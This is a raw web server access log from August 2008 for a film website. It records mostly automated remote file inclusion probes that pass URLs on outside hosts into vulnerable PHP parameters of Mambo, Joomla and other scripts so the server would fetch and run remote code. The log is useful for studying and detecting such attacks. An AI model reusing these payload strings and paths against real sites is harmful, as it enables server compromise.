61.19.158.41 - - [28/Aug/2008:06:14:52 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
61.19.158.41 - - [28/Aug/2008:06:14:52 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
202.47.247.136 - - [28/Aug/2008:06:14:52 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
202.47.247.136 - - [28/Aug/2008:06:14:52 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
61.19.158.41 - - [28/Aug/2008:06:14:52 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
61.19.158.41 - - [28/Aug/2008:06:14:52 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:15:24 -0700] "GET /logs/access_080805.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:15:25 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:15:26 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
85.25.3.10 - - [28/Aug/2008:06:15:36 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.realityfilm.com"
85.25.3.10 - - [28/Aug/2008:06:15:36 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:16:02 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:16:02 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
61.19.158.41 - - [28/Aug/2008:06:16:11 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
202.47.247.136 - - [28/Aug/2008:06:16:11 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
202.47.247.136 - - [28/Aug/2008:06:16:11 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
202.47.247.136 - - [28/Aug/2008:06:16:11 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
202.47.247.136 - - [28/Aug/2008:06:16:11 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
61.19.158.41 - - [28/Aug/2008:06:16:12 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
65.182.187.86 - - [28/Aug/2008:06:16:31 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "realityfilm.com"
200.68.51.152 - - [28/Aug/2008:06:17:23 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.realityfilm.com"
65.182.187.86 - - [28/Aug/2008:06:18:20 -0700] "GET /logs/access_080808.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "realityfilm.com"
65.182.187.86 - - [28/Aug/2008:06:18:21 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "realityfilm.com"
65.182.187.86 - - [28/Aug/2008:06:18:21 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "realityfilm.com"
207.210.89.58 - - [28/Aug/2008:06:18:24 -0700] "GET /logs/access_080731.log/index.php?autoLoadConfig=http://forum.dropball.ru/ecb832689873cfafb30938baa4991b8a/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
64.1.215.162 - - [28/Aug/2008:06:18:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "realityfilm.com"
216.71.64.94 - - [28/Aug/2008:06:18:40 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.realityfilm.com"
216.71.64.94 - - [28/Aug/2008:06:18:40 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.realityfilm.com"
216.71.64.94 - - [28/Aug/2008:06:18:41 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.realityfilm.com"
216.71.64.94 - - [28/Aug/2008:06:18:41 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.realityfilm.com"
216.71.64.94 - - [28/Aug/2008:06:18:41 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.realityfilm.com"
216.71.64.94 - - [28/Aug/2008:06:18:41 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.realityfilm.com"
201.130.79.132 - - [28/Aug/2008:06:20:04 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
201.130.79.132 - - [28/Aug/2008:06:20:04 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
201.130.79.132 - - [28/Aug/2008:06:20:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
201.130.79.132 - - [28/Aug/2008:06:20:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
201.130.79.132 - - [28/Aug/2008:06:20:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
201.130.79.132 - - [28/Aug/2008:06:20:05 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://corecyd.org/img/legolas/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:20:24 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:20:24 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:20:53 -0700] "GET /logs/scripts.log%20/errors.php?error=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
84.54.137.9 - - [28/Aug/2008:06:21:10 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.realityfilm.com"
84.54.137.9 - - [28/Aug/2008:06:21:10 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:21:15 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/botikid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:21:15 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/botikid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
62.109.176.109 - - [28/Aug/2008:06:21:16 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/botikid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.68.51.152 - - [28/Aug/2008:06:21:28 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
213.80.190.246 - - [28/Aug/2008:06:21:36 -0700] "GET /logs/access_080814.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
213.80.190.246 - - [28/Aug/2008:06:21:37 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
213.80.190.246 - - [28/Aug/2008:06:21:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:21:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:21:44 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:21:44 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:22:06 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:22:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.realityfilm.com"
163.19.117.1 - - [28/Aug/2008:06:22:07 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:22:31 -0700] "GET /logs/access_080816.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:22:31 -0700] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
74.52.139.226 - - [28/Aug/2008:06:22:32 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:23:12 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:23:12 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
209.85.26.17 - - [28/Aug/2008:06:23:12 -0700] "GET /logs/access_080809.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:23:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:23:18 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:23:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:23:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
69.64.34.172 - - [28/Aug/2008:06:24:09 -0700] "GET /logs/access_080809.log//admin/index.php?o=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
69.64.34.172 - - [28/Aug/2008:06:24:09 -0700] "GET //admin/index.php?o=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
69.64.34.172 - - [28/Aug/2008:06:24:09 -0700] "GET /logs//admin/index.php?o=http://masprast.700megs.com/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:24:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:24:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:24:22 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:24:41 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:24:44 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:25:19 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:25:19 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
200.11.67.242 - - [28/Aug/2008:06:25:55 -0700] "GET /logs/access_080731.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.realityfilm.com"
193.109.252.52 - - [28/Aug/2008:06:26:03 -0700] "GET /logs/access_080801.log/?sIncPath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.109.252.52 - - [28/Aug/2008:06:26:03 -0700] "GET /?sIncPath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.109.252.52 - - [28/Aug/2008:06:26:03 -0700] "GET /logs/?sIncPath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.realityfilm.com"
218.38.54.160 - - [28/Aug/2008:06:26:07 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
218.38.54.160 - - [28/Aug/2008:06:26:09 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
218.38.54.160 - - [28/Aug/2008:06:26:12 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
193.109.252.52 - - [28/Aug/2008:06:26:37 -0700] "GET /logs/access_080809.log/?sIncPath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
66.79.163.110 - - [28/Aug/2008:06:26:38 -0700] "GET /logs/access_080805.log/?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
66.79.163.110 - - [28/Aug/2008:06:26:38 -0700] "GET /?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.realityfilm.com"
66.79.163.110 - - [28/Aug/2008:06:26:38 -0700] "GET /logs/?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "www.realityfilm.com"
216.151.141.18 - - [28/Aug/2008:06:26:40 -0700] "GET /logs/access_080805.log/?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
216.151.141.18 - - [28/Aug/2008:06:26:40 -0700] "GET /?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.realityfilm.com"
216.151.141.18 - - [28/Aug/2008:06:26:40 -0700] "GET /logs/?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.811" "www.realityfilm.com"
66.79.163.110 - - [28/Aug/2008:06:27:02 -0700] "GET /logs/access_080731.log/?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
216.151.141.18 - - [28/Aug/2008:06:27:04 -0700] "GET /logs/access_080731.log/?sourcedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.realityfilm.com"
220.73.137.93 - - [28/Aug/2008:06:27:45 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:28:03 -0700] "GET /logs/access_080809.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
204.15.10.22 - - [28/Aug/2008:06:28:04 -0700] "GET /logs/access_080805.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
204.15.10.22 - - [28/Aug/2008:06:28:04 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
204.15.10.22 - - [28/Aug/2008:06:28:04 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:28:04 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:28:06 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
141.85.101.1 - - [28/Aug/2008:06:28:07 -0700] "GET /logs/access_080809.log//admin/index.php?o=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
141.85.101.1 - - [28/Aug/2008:06:28:07 -0700] "GET //admin/index.php?o=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
141.85.101.1 - - [28/Aug/2008:06:28:08 -0700] "GET /logs//admin/index.php?o=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:28:41 -0700] "GET /logs/access_080804.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:28:41 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:28:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:28:42 -0700] "GET /logs/access_080804.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:28:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
198.145.244.100 - - [28/Aug/2008:06:28:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.billarddepot.ca/market/logs/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.realityfilm.com"
193.111.11.7 - - [28/Aug/2008:06:28:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.realityfilm.com"
162.114.40.31 - - [28/Aug/2008:06:29:22 -0700] "GET /blog/2006/06/02/devils-playground/ HTTP/1.1" 404 275 "http://en.wikipedia.org/wiki/Devil%27s_Playground_(film)" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "realityfilm.com"
